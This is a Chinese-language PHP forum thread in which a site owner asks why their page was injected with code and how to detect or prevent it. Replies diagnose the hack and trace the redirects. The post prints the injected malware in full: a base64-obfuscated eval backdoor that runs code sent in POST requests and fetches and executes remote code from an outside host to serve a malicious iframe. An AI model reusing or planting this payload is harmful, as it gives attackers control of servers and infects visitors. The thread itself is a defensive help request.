作者wangshowp (辰脩)
看板PHP
標題[請益] 網頁被嵌入iframe-inf
時間Tue Jun 26 10:54:11 2012
請問各位大大
小妹的網頁在一開始<?php後被被嵌入如下字串
/*68066*/ error_reporting(0); @ini_set('error_log',NULL);
@ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval(
base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaWYgKGlzc2V0KCRfUE9TVFsnY29va2llc19pJ10pKSB7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnY29va2llc19pJ10pKTt9CiR6Mzc9InN0YXRzIjsKJHVhMz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiR1MzcgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJNYWMiKTsKaWYoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICR1MzcpIC4gIi9pIiwgJHVhMykpIG9yIChpc3NldCgkX1NFUlZFUlsiSFRUUF9DT09LSUUiXSkpICBvciAoaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9
BR0VOVCJdKSA9PTApICkKe30KZWxzZQp7CkBzZXRjb29raWUoJHozNyxtZDUoInN0YXRzIiksdGltZSgpKzE3MjgwMCk7CiR1cmwgPSAiaHR0cDovLzQwNDBlbnQuY29tL3Nlc3Npb24ucGhwP2lkIjsKJGlmcmFtZT1AZXZhbChmaWxlX2dldF9jb250ZW50cyAoJHVybCkpOwppZiAoJGlmcmFtZSkgZWNobygkaWZyYW1lKTsgCgp9Cg'));/*68066*/
?><?php
導致網頁會解析成iframe-inf病毒
但我不曉得是如何被嵌入的,是否有方法可以檢測?或者預防?
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 140.125.86.27
1F:推 LaPass:簡單來講,被駭了 06/26 11:00
2F:→ kerash:不知道中間被處理了甚麼,總之最後會被轉介到google 06/26 11:46
3F:→ twsphere:4040ent.com 這是妳家的??還是? 06/26 12:58
4F:→ wangshowp:不是我家>"<~會被轉到GOOGLE? 06/26 21:53
5F:→ kerash:轉到GOOGLE是最後一步,在iframe中被轉的 06/26 22:19
6F:→ kerash:實際上中途還轉介兩次網站,其中一個功能好像是把spider或 06/26 22:19
7F:→ kerash:robot在爬資料時,使他沒功能,等於你網站不會被google紀錄 06/26 22:20